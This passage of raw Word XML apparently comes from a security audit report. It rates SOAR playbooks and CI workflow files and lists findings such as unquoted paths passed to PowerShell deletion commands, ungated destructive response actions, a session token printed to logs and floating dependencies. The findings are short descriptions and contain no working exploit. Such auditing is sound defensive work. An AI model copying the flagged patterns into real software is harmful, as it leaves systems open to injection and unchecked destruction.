              <w:t>PB2-02,PB2-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File paths interpolated into a shell loop and deletion command; destructive, partly ungated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/internal_host_winrm_log4j_respond.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-03,PB2-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File paths placed unquoted into PowerShell Test-Path and Remove-Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/ransomware_investigate_and_contain.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Auto quarantine, disable, terminate and block with no prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Files rated 4 (likely issue or dangerous pattern)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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3159"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1826"/>
        <w:gridCol w:w="2755"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/appinspect.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-13,DEP-01,DEP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build toolchain dependency tree unlocked: 65 transitive packages float with no lockfile or hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/build.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build toolchain dependency tree unlocked: 65 transitive packages float with no lockfile or hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/datasource-dependabot.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build toolchain dependency tree unlocked: 65 transitive packages float with no lockfile or hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/ta_update.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03,CI-05,CI-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Prints a live session token to logs; parses remote XML; requests without timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/AWS_IAM_Account_Locking.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Azure_AD_Account_Locking.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Cisco_Umbrella_DNS_Denylisting.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Network_Isolation.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Process_Termination.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07,PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/G_Suite_for_Gmail_Message_Eviction.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/G_Suite_for_Gmail_Message_Eviction.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
